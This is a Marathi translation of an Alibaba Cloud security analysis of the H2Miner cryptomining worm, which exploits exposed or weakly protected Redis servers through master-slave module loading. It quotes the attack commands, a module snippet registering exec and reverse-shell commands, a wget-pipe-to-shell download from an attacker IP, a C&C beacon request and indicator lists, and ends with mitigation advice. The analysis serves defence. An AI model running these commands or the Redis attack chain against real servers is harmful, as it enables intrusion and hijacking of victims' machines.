H2Miner वर्म्सचा एक नवीन उद्रेक शोधला गेला आहे जो Redis RCE चे शोषण करतो

एका दिवसापूर्वी, माझ्या प्रोजेक्टच्या सर्व्हरवर अशाच किड्याने हल्ला केला होता. "ते काय होते?" या प्रश्नाच्या उत्तराच्या शोधात मला अलिबाबा क्लाउड सिक्युरिटी टीमचा एक उत्तम लेख सापडला. मला हाब्रेवर हा लेख सापडला नाही म्हणून, मी विशेषतः तुमच्यासाठी अनुवादित करण्याचे ठरवले <3

नोंद

अलीकडेच, अलीबाबा क्लाउडच्या सुरक्षा पथकाने H2Miner चा अचानक उद्रेक शोधला. या प्रकारचा दुर्भावनायुक्त वर्म आपल्या सिस्टमचे प्रवेशद्वार म्हणून Redis साठी अधिकृततेचा अभाव किंवा कमकुवत संकेतशब्द वापरतो, त्यानंतर तो मास्टर-स्लेव्ह सिंक्रोनाइझेशनद्वारे स्लेव्हसह स्वतःचे दुर्भावनापूर्ण मॉड्यूल सिंक्रोनाइझ करतो आणि शेवटी हे दुर्भावनापूर्ण मॉड्यूल आक्रमण केलेल्या मशीनवर डाउनलोड करतो आणि दुर्भावनापूर्ण कार्यान्वित करतो. सूचना.

भूतकाळात, आक्रमणकर्त्याने Redis मध्ये लॉग इन केल्यानंतर तुमच्या मशीनवर लिहिल्या गेलेल्या शेड्यूल केलेल्या टास्क किंवा SSH कीचा समावेश असलेल्या पद्धतीचा वापर करून तुमच्या सिस्टमवरील हल्ले प्रामुख्याने केले जात होते. सुदैवाने, ही पद्धत परवानगी नियंत्रणातील समस्यांमुळे किंवा भिन्न सिस्टम आवृत्त्यांमुळे वापरली जाऊ शकत नाही. तथापि, दुर्भावनायुक्त मॉड्यूल लोड करण्याची ही पद्धत थेट आक्रमणकर्त्याच्या आदेशांची अंमलबजावणी करू शकते किंवा शेलमध्ये प्रवेश मिळवू शकते, जे तुमच्या सिस्टमसाठी धोकादायक आहे.

इंटरनेटवर होस्ट केलेल्या रेडिस सर्व्हरच्या मोठ्या संख्येमुळे (जवळपास 1 दशलक्ष), Alibaba क्लाउडची सुरक्षा टीम, एक मैत्रीपूर्ण स्मरणपत्र म्हणून, वापरकर्त्यांनी Redis ऑनलाइन शेअर करू नये आणि त्यांच्या पासवर्डची ताकद आणि त्यांच्याशी तडजोड केली आहे की नाही हे नियमितपणे तपासण्याची शिफारस केली आहे. द्रुत निवड.

H2 Miner

H2Miner हे लिनक्स-आधारित सिस्टीमसाठी एक मायनिंग बॉटनेट आहे जे आपल्या सिस्टमवर हडूप यार्न, डॉकर आणि रेडिस रिमोट कमांड एक्झिक्युशन (RCE) भेद्यतेच्या अभावासह विविध मार्गांनी आक्रमण करू शकते. बॉटनेट दुर्भावनापूर्ण स्क्रिप्ट्स आणि मालवेअर डाउनलोड करून तुमचा डेटा खणून कार्य करते, हल्ला आडवा वाढवते आणि कमांड आणि कंट्रोल (C&C) संप्रेषणे राखते.

Redis RCE

या विषयावरील ज्ञान पावेल टोपोरकोव्ह यांनी ZeroNights 2018 मध्ये सामायिक केले होते. आवृत्ती 4.0 नंतर, Redis प्लग-इन लोडिंग वैशिष्ट्यास समर्थन देते जे वापरकर्त्यांना लोड करण्याची क्षमता देते जेणेकरून Redis मध्ये C सह संकलित केलेल्या फाइल्स विशिष्ट Redis कमांड कार्यान्वित करण्यासाठी. हे कार्य, जरी उपयुक्त असले तरी, त्यात एक असुरक्षा आहे ज्यामध्ये, मास्टर-स्लेव्ह मोडमध्ये, फाईल्स फुलरेसिंक मोडद्वारे स्लेव्हसह समक्रमित केल्या जाऊ शकतात. हे दुर्भावनापूर्ण फायली हस्तांतरित करण्यासाठी आक्रमणकर्त्याद्वारे वापरले जाऊ शकते. हस्तांतरण पूर्ण झाल्यानंतर, आक्रमणकर्ते आक्रमण केलेल्या रेडिस उदाहरणावर मॉड्यूल लोड करतात आणि कोणतीही कमांड कार्यान्वित करतात.

मालवेअर वर्म विश्लेषण

अलीकडे, अलीबाबा क्लाउड सुरक्षा संघाने शोधून काढले की H2Miner दुर्भावनापूर्ण खाण कामगार गटाचा आकार अचानक नाटकीयरित्या वाढला आहे. विश्लेषणानुसार, हल्ल्याच्या घटनेची सामान्य प्रक्रिया खालीलप्रमाणे आहे:

H2Miner पूर्ण हल्ल्यासाठी RCE Redis वापरते. हल्लेखोर प्रथम असुरक्षित रेडिस सर्व्हर किंवा कमकुवत पासवर्ड असलेल्या सर्व्हरवर हल्ला करतात.

मग ते कमांड वापरतात config set dbfilename red2.so फाइलचे नाव बदलण्यासाठी. यानंतर, हल्लेखोर आदेशाची अंमलबजावणी करतात slaveof मास्टर-स्लेव्ह प्रतिकृती होस्ट पत्ता सेट करण्यासाठी.

आक्रमण केलेल्या रेडिस उदाहरणाने आक्रमणकर्त्याच्या मालकीच्या दुर्भावनापूर्ण रेडिससह मास्टर-स्लेव्ह कनेक्शन स्थापित केले, तेव्हा आक्रमणकर्ता फाइल्स सिंक्रोनाइझ करण्यासाठी फुलरेसिंक कमांड वापरून संक्रमित मॉड्यूल पाठवतो. red2.so फाईल नंतर आक्रमण केलेल्या मशीनवर डाउनलोड केली जाईल. हल्लेखोर नंतर ही फाइल लोड करण्यासाठी ./red2.so लोडिंग मॉड्यूल वापरतात. मॉड्यूल आक्रमणकर्त्याकडून आदेश कार्यान्वित करू शकते किंवा आक्रमण केलेल्या मशीनमध्ये प्रवेश मिळविण्यासाठी रिव्हर्स कनेक्शन (बॅकडोअर) सुरू करू शकते.

if (RedisModule_CreateCommand(ctx, "system.exec",
        DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
        return REDISMODULE_ERR;
      if (RedisModule_CreateCommand(ctx, "system.rev",
        RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
        return REDISMODULE_ERR;

दुर्भावनायुक्त कमांड कार्यान्वित केल्यानंतर जसे की / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1, आक्रमणकर्ता बॅकअप फाइल नाव रीसेट करेल आणि ट्रेस साफ करण्यासाठी सिस्टम मॉड्यूल अनलोड करेल. तथापि, red2.so फाईल अद्याप आक्रमण केलेल्या मशीनवर राहील. वापरकर्त्यांना त्यांच्या रेडिस उदाहरणाच्या फोल्डरमध्ये अशा संशयास्पद फाइलच्या उपस्थितीकडे लक्ष देण्याची सल्ला देण्यात आली आहे.

संसाधने चोरण्यासाठी काही दुर्भावनापूर्ण प्रक्रिया मारण्याव्यतिरिक्त, आक्रमणकर्त्याने दुर्भावनापूर्ण बायनरी फाइल डाउनलोड करून आणि कार्यान्वित करून दुर्भावनापूर्ण स्क्रिप्टचे अनुसरण केले. 142.44.191.122/kinsing. याचा अर्थ असा की होस्टवरील kinsing असलेले प्रक्रिया नाव किंवा निर्देशिका नाव हे सूचित करू शकते की मशीनला या विषाणूचा संसर्ग झाला आहे.

उलट अभियांत्रिकी परिणामांनुसार, मालवेअर प्रामुख्याने खालील कार्ये करते:

• फायली अपलोड करणे आणि ते कार्यान्वित करणे
• खाणकाम
• C&C संप्रेषण राखणे आणि आक्रमणकर्त्यांच्या आदेशांची अंमलबजावणी करणे

तुमचा प्रभाव वाढवण्यासाठी बाह्य स्कॅनिंगसाठी masscan वापरा. याव्यतिरिक्त, प्रोग्राममध्ये C&C सर्व्हरचा IP पत्ता हार्ड-कोड केलेला आहे आणि हल्ला केलेला होस्ट HTTP विनंत्या वापरून C&C कम्युनिकेशन सर्व्हरशी संप्रेषण करेल, जेथे झोम्बी (तडजोड सर्व्हर) माहिती HTTP शीर्षलेखात ओळखली जाते.

GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip

इतर आक्रमण पद्धती

अळी द्वारे वापरलेले पत्ते आणि दुवे

/ नातेसंबंध

• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh

s&c

• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193

टीप

प्रथम, Redis इंटरनेटवरून प्रवेश करण्यायोग्य नसावे आणि मजबूत पासवर्डसह संरक्षित केले जावे. रेडिस निर्देशिकेत कोणतीही red2.so फाईल नाही आणि होस्टवरील फाइल/प्रक्रियेच्या नावामध्ये "किन्सिंग" नाही हे क्लायंटने तपासणे देखील महत्त्वाचे आहे.

स्त्रोत: www.habr.com